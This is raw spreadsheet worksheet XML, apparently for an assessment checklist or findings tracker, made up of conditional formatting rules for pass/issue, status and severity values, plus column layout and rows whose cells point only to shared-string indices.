    <cfRule type="cellIs" dxfId="4" priority="2" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="5" priority="1" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I4">
    <cfRule type="containsText" dxfId="0" priority="6" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I4)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="5" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I4)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="4" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I4)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A8">
    <cfRule type="cellIs" dxfId="5" priority="43" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="44" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="3" priority="45" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A9">
    <cfRule type="cellIs" dxfId="5" priority="40" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="41" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="3" priority="42" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H9">
    <cfRule type="cellIs" dxfId="3" priority="27" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="26" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="5" priority="25" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I9">
    <cfRule type="containsText" dxfId="0" priority="30" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I9)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="29" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I9)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="28" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I9)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A10">
    <cfRule type="cellIs" dxfId="5" priority="37" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="38" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="3" priority="39" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H10">
    <cfRule type="cellIs" dxfId="3" priority="21" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="20" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="5" priority="19" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I10">
    <cfRule type="containsText" dxfId="0" priority="24" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I10)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="23" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I10)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="22" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I10)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H11">
    <cfRule type="cellIs" dxfId="3" priority="15" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="14" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="5" priority="13" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I11">
    <cfRule type="containsText" dxfId="0" priority="18" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I11)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="17" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I11)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="16" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I11)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H5:H8">
    <cfRule type="cellIs" dxfId="3" priority="33" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="32" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="5" priority="31" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H12:H14">
    <cfRule type="cellIs" dxfId="3" priority="9" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="8" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="5" priority="7" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I5:I8">
    <cfRule type="containsText" dxfId="0" priority="36" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I5)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="35" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I5)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="34" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I5)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I12:I14">
    <cfRule type="containsText" dxfId="0" priority="12" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I12)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="11" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I12)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="10" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I12)))</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="2">
    <dataValidation type="list" allowBlank="1" showInputMessage="1" prompt="result" sqref="H4">
      <formula1>$A$10:$A$12</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" prompt="result" sqref="H5:H14">
      <formula1>$A$16:$A$23</formula1>
    </dataValidation>
  </dataValidation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7030A0"/>
  </sheetPr>
  <dimension ref="A1:J5"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <selection activeCell="J9" sqref="J9"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.61261261261261" defaultRowHeight="14.1" outlineLevelRow="4"/>
  <cols>
    <col min="1" max="1" width="10.1171171171171" customWidth="1"/>
    <col min="2" max="2" width="19.8378378378378" customWidth="1"/>
    <col min="3" max="3" width="18.9189189189189" customWidth="1"/>
    <col min="4" max="4" width="19.3063063063063" customWidth="1"/>
    <col min="5" max="5" width="29.8828828828829" customWidth="1"/>
    <col min="6" max="6" width="20.4684684684685" customWidth="1"/>
    <col min="7" max="7" width="18.2252252252252" customWidth="1"/>
    <col min="8" max="8" width="21.3063063063063" customWidth="1"/>
    <col min="9" max="9" width="19.8468468468468" customWidth="1"/>
    <col min="10" max="10" width="22.4774774774775" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" ht="18.4" spans="1:10">
      <c r="A1" s="1" t="s">
        <v>532</v>
      </c>
      <c r="B1" s="1"/>
      <c r="C1" s="1"/>
      <c r="D1" s="1"/>
      <c r="E1" s="1"/>
      <c r="F1" s="1"/>
      <c r="G1" s="1"/>
      <c r="H1" s="1"/>
      <c r="I1" s="1"/>
      <c r="J1" s="1"/>
    </row>
    <row r="2" spans="1:10">
      <c r="A2" s="2"/>
      <c r="B2" s="2"/>
      <c r="C2" s="3"/>
      <c r="D2" s="3"/>
      <c r="E2" s="4"/>
      <c r="F2" s="4"/>
      <c r="G2" s="4"/>
      <c r="H2" s="4"/>
      <c r="I2" s="4"/>
      <c r="J2" s="10"/>
    </row>
    <row r="3" spans="1:10">
      <c r="A3" s="5" t="s">
        <v>533</v>
      </c>
      <c r="B3" s="5" t="s">
        <v>2</v>
      </c>
      <c r="C3" s="5" t="s">
        <v>534</v>
      </c>
      <c r="D3" s="5" t="s">
        <v>535</v>
      </c>
      <c r="E3" s="5" t="s">
        <v>536</v>
      </c>
      <c r="F3" s="5" t="s">
        <v>537</v>
      </c>
      <c r="G3" s="5" t="s">
        <v>538</v>
      </c>
      <c r="H3" s="5" t="s">
        <v>539</v>
      </c>
      <c r="I3" s="5" t="s">
        <v>540</v>
      </c>
      <c r="J3" s="5" t="s">
        <v>541</v>
      </c>
    </row>
    <row r="4" ht="19" customHeight="1" spans="1:10">
      <c r="A4" s="5"/>
      <c r="B4" s="5"/>
      <c r="C4" s="5"/>
      <c r="D4" s="5"/>
      <c r="E4" s="5"/>
      <c r="F4" s="5"/>
      <c r="G4" s="5"/>
      <c r="H4" s="5"/>
      <c r="I4" s="5"/>
      <c r="J4" s="5"/>
    </row>
    <row r="5" ht="35" customHeight="1" spans="1:10">
      <c r="A5" s="6" t="s">
        <v>542</v>
      </c>
      <c r="B5" s="6" t="s">
        <v>543</v>
      </c>
      <c r="C5" s="7"/>
      <c r="D5" s="8" t="s">
        <v>544</v>
      </c>
      <c r="E5" s="8" t="s">
        <v>545</v>
      </c>
      <c r="F5" s="8" t="s">
        <v>544</v>
      </c>
      <c r="G5" s="9"/>
      <c r="H5" s="9"/>
      <c r="I5" s="9"/>
      <c r="J5" s="9"/>
    </row>
  </sheetData>
  <mergeCells count="11">
    <mergeCell ref="A1:J1"/>
    <mergeCell ref="A3:A4"/>
    <mergeCell ref="B3:B4"/>
    <mergeCell ref="C3:C4"/>
    <mergeCell ref="D3:D4"/>
    <mergeCell ref="E3:E4"/>
    <mergeCell ref="F3:F4"/>
    <mergeCell ref="G3:G4"/>
    <mergeCell ref="H3:H4"/>
    <mergeCell ref="I3:I4"/>
    <mergeCell ref="J3:J4"/>
  </mergeCells>
  <conditionalFormatting sqref="D5:F5">
    <cfRule type="cellIs" dxfId="6" priority="5" operator="equal">
      <formula>"High"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="7" priority="4" operator="equal">
      <formula>"Moderate"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="8" priority="3" operator="equal">
      <formula>"Low"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="9" priority="2" operator="equal">
      <formula>"OFI"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="10" priority="1" operator="equal">
      <formula>"Critical"</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="1">
    <dataValidation type="list" allowBlank="1" showErrorMessage="1" sqref="D5:F5">
      <formula1>"Critical,High,Moderate,Low,OFI"</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2"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="D3" sqref="D3"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="14.1"/>
  <cols>
    <col min="1" max="2" width="9" style="11"/>
    <col min="3" max="3" width="41.1891891891892" style="11" customWidth="1"/>
    <col min="4" max="4" width="113.504504504505" style="11" customWidth="1"/>
    <col min="5" max="5" width="31.9459459459459" style="11" customWidth="1"/>
    <col min="6" max="6" width="19.7567567567568" style="11" customWidth="1"/>
    <col min="7" max="7" width="17.3243243243243" style="11" customWidth="1"/>
    <col min="8" max="8" width="9" style="11"/>
    <col min="9" max="9" width="14.7477477477477" style="11" customWidth="1"/>
    <col min="10" max="10" width="12.8558558558559" style="11" customWidth="1"/>
    <col min="11" max="16384" width="9" style="11"/>
  </cols>
  <sheetData>
    <row r="1" s="11" customFormat="1" ht="18.4" spans="1:10">
      <c r="A1" s="1" t="s">
        <v>71</v>
      </c>
      <c r="B1" s="1"/>
      <c r="C1" s="1"/>
      <c r="D1" s="1"/>
      <c r="E1" s="1"/>
      <c r="F1" s="1"/>
      <c r="G1" s="1"/>
      <c r="H1" s="1"/>
      <c r="I1" s="1"/>
      <c r="J1" s="1"/>
    </row>
    <row r="3" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A3" s="5" t="s">
        <v>1</v>
      </c>
      <c r="B3" s="5" t="s">
        <v>2</v>
      </c>
      <c r="C3" s="5" t="s">
        <v>3</v>
      </c>
      <c r="D3" s="5" t="s">
        <v>4</v>
      </c>
      <c r="E3" s="5" t="s">
        <v>5</v>
      </c>
      <c r="F3" s="5" t="s">
        <v>6</v>
      </c>
      <c r="G3" s="5" t="s">
        <v>7</v>
      </c>
      <c r="H3" s="5" t="s">
        <v>8</v>
      </c>
      <c r="I3" s="5" t="s">
        <v>9</v>
      </c>
      <c r="J3" s="5" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="4" s="11" customFormat="1" ht="43.7" spans="1:10">
      <c r="A4" s="12" t="s">
        <v>72</v>
      </c>
      <c r="B4" s="48" t="s">
        <v>73</v>
      </c>
      <c r="C4" s="14" t="s">
        <v>74</v>
      </c>
      <c r="D4" s="15" t="s">
        <v>75</v>
      </c>
      <c r="E4" s="45" t="s">
        <v>76</v>
      </c>
      <c r="F4" s="17" t="s">
        <v>77</v>
      </c>
      <c r="G4" s="49" t="s">
        <v>78</v>
      </c>
      <c r="H4" s="17"/>
      <c r="I4" s="32"/>
      <c r="J4" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="5" s="11" customFormat="1" ht="141" spans="1:10">
      <c r="A5" s="12" t="s">
        <v>79</v>
      </c>
      <c r="B5" s="48" t="s">
        <v>80</v>
      </c>
      <c r="C5" s="14" t="s">
        <v>81</v>
      </c>
      <c r="D5" s="15" t="s">
        <v>82</v>
      </c>
      <c r="E5" s="53" t="s">
        <v>83</v>
      </c>
      <c r="F5" s="54" t="s">
        <v>84</v>
      </c>
      <c r="G5" s="54" t="s">
        <v>85</v>
      </c>
      <c r="H5" s="17"/>
      <c r="I5" s="32"/>
      <c r="J5" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="6" s="11" customFormat="1" ht="56.55" spans="1:10">
      <c r="A6" s="12" t="s">
        <v>86</v>
      </c>
      <c r="B6" s="48" t="s">
        <v>87</v>
      </c>
      <c r="C6" s="14" t="s">
        <v>88</v>
      </c>
      <c r="D6" s="15" t="s">
        <v>89</v>
      </c>
      <c r="E6" s="53" t="s">
        <v>90</v>
      </c>
      <c r="F6" s="54" t="s">
        <v>30</v>
      </c>
      <c r="G6" s="54" t="s">
        <v>91</v>
      </c>
      <c r="H6" s="17"/>
      <c r="I6" s="32"/>
      <c r="J6" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="7" s="11" customFormat="1" ht="56.55" spans="1:10">
      <c r="A7" s="12" t="s">
        <v>92</v>
      </c>
      <c r="B7" s="48" t="s">
        <v>93</v>
      </c>
      <c r="C7" s="14" t="s">
        <v>94</v>
      </c>
      <c r="D7" s="15" t="s">
        <v>95</v>
      </c>
      <c r="E7" s="53" t="s">
        <v>90</v>
      </c>
      <c r="F7" s="54" t="s">
        <v>30</v>
      </c>
      <c r="G7" s="54" t="s">
        <v>96</v>
      </c>
      <c r="H7" s="17"/>
      <c r="I7" s="32"/>
      <c r="J7" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="8" s="11" customFormat="1" ht="42.45" spans="1:10">
      <c r="A8" s="12" t="s">
        <v>97</v>
      </c>
      <c r="B8" s="48" t="s">
        <v>98</v>
      </c>
      <c r="C8" s="14" t="s">
        <v>99</v>
      </c>
      <c r="D8" s="15" t="s">
        <v>100</v>
      </c>
      <c r="E8" s="45" t="s">
        <v>101</v>
      </c>
      <c r="F8" s="54" t="s">
        <v>102</v>
      </c>
      <c r="G8" s="54" t="s">
        <v>103</v>
      </c>
      <c r="H8" s="17"/>
      <c r="I8" s="32"/>
      <c r="J8" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="9" s="11" customFormat="1" ht="42.45" spans="1:10">
      <c r="A9" s="12" t="s">
        <v>104</v>
      </c>
      <c r="B9" s="48" t="s">
        <v>105</v>
      </c>
      <c r="C9" s="14" t="s">
        <v>106</v>
      </c>
      <c r="D9" s="15" t="s">
        <v>107</v>
      </c>
      <c r="E9" s="46" t="s">
        <v>108</v>
      </c>
      <c r="F9" s="34" t="s">
        <v>109</v>
      </c>
      <c r="G9" s="34" t="s">
        <v>110</v>
      </c>
      <c r="H9" s="17"/>
      <c r="I9" s="32"/>
      <c r="J9" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="10" s="11" customFormat="1" ht="42.45" spans="1:10">
      <c r="A10" s="12" t="s">
        <v>111</v>
      </c>
      <c r="B10" s="48" t="s">
        <v>112</v>
      </c>
      <c r="C10" s="14" t="s">
        <v>113</v>
      </c>
      <c r="D10" s="15" t="s">
        <v>114</v>
      </c>
      <c r="E10" s="46" t="s">
        <v>115</v>
      </c>
      <c r="F10" s="34" t="s">
        <v>109</v>
      </c>
      <c r="G10" s="34" t="s">
        <v>116</v>
      </c>
      <c r="H10" s="17"/>
      <c r="I10" s="32"/>
      <c r="J10" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="11" s="11" customFormat="1" ht="29.15" spans="1:10">
      <c r="A11" s="12" t="s">
        <v>117</v>
      </c>
      <c r="B11" s="48" t="s">
        <v>118</v>
      </c>
      <c r="C11" s="14" t="s">
        <v>119</v>
      </c>
      <c r="D11" s="15" t="s">
        <v>120</v>
      </c>
      <c r="E11" s="46" t="s">
        <v>115</v>
      </c>
      <c r="F11" s="34" t="s">
        <v>109</v>
      </c>
      <c r="G11" s="34" t="s">
        <v>121</v>
      </c>
      <c r="H11" s="17"/>
      <c r="I11" s="32"/>
      <c r="J11" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="12" s="11" customFormat="1" ht="29.15" spans="1:10">
      <c r="A12" s="12" t="s">
        <v>122</v>
      </c>
      <c r="B12" s="48" t="s">
        <v>123</v>
      </c>
      <c r="C12" s="14" t="s">
        <v>124</v>
      </c>
      <c r="D12" s="15" t="s">
        <v>125</v>
      </c>
      <c r="E12" s="46" t="s">
        <v>126</v>
      </c>
      <c r="F12" s="34" t="s">
        <v>127</v>
      </c>
      <c r="G12" s="34" t="s">
        <v>128</v>
      </c>
      <c r="H12" s="17"/>
      <c r="I12" s="32"/>
      <c r="J12" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="13" s="11" customFormat="1" ht="29.15" spans="1:10">
      <c r="A13" s="12" t="s">
        <v>129</v>
      </c>
      <c r="B13" s="48" t="s">
        <v>130</v>
      </c>
      <c r="C13" s="14" t="s">
        <v>131</v>
      </c>
      <c r="D13" s="15" t="s">
        <v>132</v>
      </c>
      <c r="E13" s="46" t="s">
        <v>133</v>
      </c>
      <c r="F13" s="50" t="s">
        <v>16</v>
      </c>
      <c r="G13" s="34" t="s">
        <v>134</v>
      </c>
      <c r="H13" s="17"/>
      <c r="I13" s="32"/>
      <c r="J13" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="14" s="11" customFormat="1" ht="29.15" spans="1:10">
      <c r="A14" s="12" t="s">
        <v>135</v>
      </c>
      <c r="B14" s="48" t="s">
        <v>136</v>
      </c>
      <c r="C14" s="14" t="s">
        <v>137</v>
      </c>
      <c r="D14" s="51" t="s">
        <v>138</v>
      </c>
      <c r="E14" s="46" t="s">
        <v>139</v>
      </c>
      <c r="F14" s="34" t="s">
        <v>30</v>
      </c>
      <c r="G14" s="34" t="s">
        <v>140</v>
      </c>
      <c r="H14" s="17"/>
      <c r="I14" s="32"/>
      <c r="J14" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="15" s="11" customFormat="1" ht="29.15" spans="1:10">
      <c r="A15" s="12" t="s">
        <v>141</v>
      </c>
      <c r="B15" s="48" t="s">
        <v>142</v>
      </c>
      <c r="C15" s="14" t="s">
        <v>143</v>
      </c>
      <c r="D15" s="51" t="s">
        <v>144</v>
      </c>
      <c r="E15" s="46" t="s">
        <v>145</v>
      </c>
      <c r="F15" s="34" t="s">
        <v>109</v>
      </c>
      <c r="G15" s="34" t="s">
        <v>146</v>
      </c>
      <c r="H15" s="14"/>
      <c r="I15" s="14"/>
      <c r="J15" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="16" s="11" customFormat="1" ht="29.15" spans="1:10">
      <c r="A16" s="12" t="s">
        <v>147</v>
      </c>
      <c r="B16" s="48" t="s">
        <v>148</v>
      </c>
      <c r="C16" s="14" t="s">
        <v>149</v>
      </c>
      <c r="D16" s="51" t="s">
        <v>150</v>
      </c>
      <c r="E16" s="46" t="s">
        <v>51</v>
      </c>
      <c r="F16" s="34" t="s">
        <v>109</v>
      </c>
      <c r="G16" s="34" t="s">
        <v>151</v>
      </c>
      <c r="H16" s="14"/>
      <c r="I16" s="14"/>
      <c r="J16" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="18" s="11" customFormat="1" ht="14.15"/>
    <row r="19" s="11" customFormat="1" ht="14.15" spans="1:1">
      <c r="A19" s="25" t="s">
        <v>67</v>
      </c>
    </row>
    <row r="20" s="11" customFormat="1" ht="14.15" spans="1:1">
      <c r="A20" s="27" t="s">
        <v>68</v>
      </c>
    </row>
    <row r="21" s="11" customFormat="1" ht="14.15" spans="1:1">
      <c r="A21" s="28" t="s">
        <v>69</v>
      </c>
    </row>
    <row r="22" ht="14.15" spans="1:1">
      <c r="A22" s="17" t="s">
        <v>70</v>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A3:J16">
    <extLst/>
  </autoFilter>
  <mergeCells count="2">
    <mergeCell ref="A1:J1"/>
    <mergeCell ref="A2:J2"/>
  </mergeCells>
  <conditionalFormatting sqref="I1:J1">
    <cfRule type="containsText" dxfId="0" priority="42" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I1)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="41" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I1)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="40" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I1)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H9">
    <cfRule type="cellIs" dxfId="3" priority="21" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="20" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="5" priority="19" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I9">
    <cfRule type="containsText" dxfId="0" priority="24" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I9)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="23" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I9)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="22" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I9)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H10">
    <cfRule type="cellIs" dxfId="3" priority="15" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="14" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="5" priority="13" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I10">
    <cfRule type="containsText" dxfId="0" priority="18" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I10)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="17" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I10)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="16" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I10)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H11">
    <cfRule type="cellIs" dxfId="3" priority="9" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="8" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="5" priority="7" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I11">
    <cfRule type="containsText" dxfId="0" priority="12" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I11)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="11" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I11)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="10" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I11)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A20">
    <cfRule type="cellIs" dxfId="5" priority="37" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="38" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="3" priority="39" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A21">
    <cfRule type="cellIs" dxfId="5" priority="34" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="35" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="3" priority="36" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A22">
    <cfRule type="cellIs" dxfId="5" priority="31" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="32" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="3" priority="33" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H4:H8">
    <cfRule type="cellIs" dxfId="3" priority="27" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="26" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="5" priority="25" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H12:H14">
    <cfRule type="cellIs" dxfId="3" priority="3" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="2" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="5" priority="1" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I4:I8">
    <cfRule type="containsText" dxfId="0" priority="30" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I4)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="29" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I4)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="28" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I4)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I12:I14">
    <cfRule type="containsText" dxfId="0" priority="6" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I12)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="5" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I12)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="4" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I12)))</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="1">
    <dataValidation type="list" allowBlank="1" showInputMessage="1" prompt="result" sqref="H4:H14">
      <formula1>$A$22:$A$23</formula1>
    </dataValidation>
  </dataValidations>
  <pageMargins left="0.7" right="0.7"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6"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="D3" sqref="D3"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="14.1"/>
  <cols>
    <col min="1" max="2" width="9" style="11"/>
    <col min="3" max="3" width="41.1891891891892" style="11" customWidth="1"/>
    <col min="4" max="4" width="113.504504504505" style="11" customWidth="1"/>
    <col min="5" max="5" width="31.9459459459459" style="11" customWidth="1"/>
    <col min="6" max="6" width="19.7567567567568" style="11" customWidth="1"/>
    <col min="7" max="7" width="17.3243243243243" style="11" customWidth="1"/>
    <col min="8" max="8" width="9" style="11"/>
    <col min="9" max="9" width="14.7477477477477" style="11" customWidth="1"/>
    <col min="10" max="10" width="12.8558558558559" style="11" customWidth="1"/>
    <col min="11" max="16384" width="9" style="11"/>
  </cols>
  <sheetData>
    <row r="1" ht="18.4" spans="1:10">
      <c r="A1" s="1" t="s">
        <v>152</v>
      </c>
      <c r="B1" s="1"/>
      <c r="C1" s="1"/>
      <c r="D1" s="1"/>
      <c r="E1" s="1"/>
      <c r="F1" s="1"/>
      <c r="G1" s="1"/>
      <c r="H1" s="1"/>
